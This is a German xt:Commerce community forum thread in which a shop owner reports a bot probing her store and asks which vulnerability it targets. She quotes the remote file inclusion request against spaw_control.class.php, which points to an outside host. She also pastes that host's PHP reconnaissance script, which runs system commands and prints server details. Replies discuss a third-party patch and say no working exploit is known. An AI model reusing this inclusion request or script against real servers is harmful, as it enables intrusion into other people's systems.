Jump to content
xt:Commerce Community Forum

Hackerangriff spaw_control_.class.php???


marama

Recommended Posts

Hallo,

bei mir marschiert gerade ein bot durch den Shop der alle Seiten mit

/reviews.php?language=fr/////admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://indo.home.ro/idscan.txt???

auf allen Seiten durchrackert.

Ich nehme an das ist ein hacker... auf welche Sicherheitslücke zielt der ab? Sollte ich da eine bestimmte Lücke nochmal prüfen?

Vielen Dank,

Martina

Nachtrag: Die http://indo.home.ro/idscan.txt enthält

echo "ALBANIA<br>";

$alb = @php_uname();

$alb2 = system(uptime);

$alb3 = system(id);

$alb4 = @getcwd();

$alb5 = getenv("SERVER_SOFTWARE");

$alb6 = phpversion();

$alb7 = $_SERVER['SERVER_NAME'];

$alb8 = gethostbyname($SERVER_ADDR);

$alb9 = get_current_user();

$os = @PHP_OS;

echo "os: $os<br>";

echo "uname -a: $alb<br>";

echo "uptime: $alb2<br>";

echo "id: $alb3<br>";

echo "pwd: $alb4<br>";

echo "user: $alb9<br>";

echo "phpv: $alb6<br>";

echo "SoftWare: $alb5<br>";

echo "ServerName: $alb7<br>";

echo "ServerAddr: $alb8<br>";

echo "ALBANIA;br>";

exit;

Link to comment
Share on other sites

  • 1 month later...

... sorry, ich kann keinen neuen Tread aufmachen ... da stimmt was mit meinen Rechten nicht.

Im Netz bin ich aber auf einen Sicherheitspatch von Ruhrmedia gestoßen, der eine aktuelle Sicherheitslücke vom xtc (alle xtCommerce-Versionen ab 3.0.2 ) schließen soll.

WARUM findet man hier im Forum keinen Hinweis auf eine Lücke ?

Infos unter ruhrmedia .de

????

Link to comment
Share on other sites

Weils keine Lücke augenscheinlich gibt.

Die SuFu liefert dafür folgendes, was du hättest finden müssen:

http://www.xt-commerce.com/forum/allgemeine-diskussionen/75425-neues-sicherheitsloch-von-gambio-auch-xtc.html

Derzeit ist uns kein funktionierender Exploit bekannt.

Eine Behebung wie bei diesem Patch vorgeschlagen, würde ein (wenn) existstendes Problem auch nicht vollständig Lösen.

Wenn jemand einen Funktionierenden Exploit hat, kan ner uns diesen gerne senden und wir überprüfen dies.

In dem Thread ging es genau darum, das rote ist übrigens mein Suchbegriff;)

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
  • Create New...